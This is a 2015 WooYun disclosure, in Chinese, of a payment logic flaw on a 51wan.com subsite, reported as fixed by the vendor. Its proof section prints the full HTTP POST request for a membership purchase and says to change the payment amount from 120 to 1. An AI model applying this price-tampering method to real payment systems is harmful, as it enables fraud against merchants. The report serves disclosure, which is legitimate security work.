当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103737

漏洞标题:51wan某分站支付漏洞

相关厂商:51wan.com

漏洞作者: ssss

提交时间:2015-03-30 09:44

修复时间:2015-05-14 09:50

公开时间:2015-05-14 09:50

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经确认,细节仅向厂商公开
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开

简要描述:

看网页游戏时,看到了,就顺手测测了,不料。。。。
51wan某分站支付漏洞

详细说明:

http://vip.51wan.com (会员中心)
进入开年费会员的页面;
然后进入支付宝网银支付;

屏幕快照 2015-03-25 下午7.49.54.png


接着;

屏幕快照 2015-03-25 下午7.51.24.png


漏洞证明:

POST /index.php?module=trade&control=confirm&xy=yearcard-19--0 HTTP/1.1
Host: pay.51wan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://pay.51wan.com/index.php?module=trade&control=index&action=trade&xy=yearcard-19---
Cookie: fromWebUrl=pay; CNZZDATA30022271=cnzz_eid%3D909180399-1427282807-http%253A%252F%252Fvip.51wan.com%252F%26ntime%3D1427281726; CNZZDATA30022279=cnzz_eid%3D542811967-1427281046-http%253A%252F%252Fvip.51wan.com%252F%26ntime%3D1427281046; PHPSESSID=615d3b6a989e7727a86491e87acad2dd; Hm_lvt_d58dd3fa9fbbc5aca88e38124a7909bc=1427284190; Hm_lpvt_d58dd3fa9fbbc5aca88e38124a7909bc=1427284190
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
u_check=&username=guo****%40126.com&reusername=guo****%40126.com&serverid=10173&payMoney=120&coid=0&money=120&defaultbank=CCB


修改此处的120 值。
为1咯

屏幕快照 2015-03-25 下午8.01.25副本.jpg

屏幕快照 2015-03-25 下午7.49.09副本.jpg


修复方案:

很严重的漏洞啊~
赶紧修复吧,求高rank,求礼物~~

版权声明:转载请注明来源 ssss@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-03-30 09:48

厂商回复:

多谢反馈,漏洞已修复!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-30 09:49 | 咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )

    去。。。。。好快

  2. 2015-03-30 16:24 | ssss ( 实习白帽子 | Rank:80 漏洞数:19 | 虫子是给早起的勤奋的鸟儿七的。)

    @咸鱼翻身 其实提交了好几天了,今天才正式注册为厂商,不知道乌云怎么算时间的。

  3. 2015-03-30 16:26 | 咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )

    @ssss 懂了。。。。

  4. 2015-03-30 16:46 | ssss ( 实习白帽子 | Rank:80 漏洞数:19 | 虫子是给早起的勤奋的鸟儿七的。)

    @咸鱼翻身 秒懂啊~棒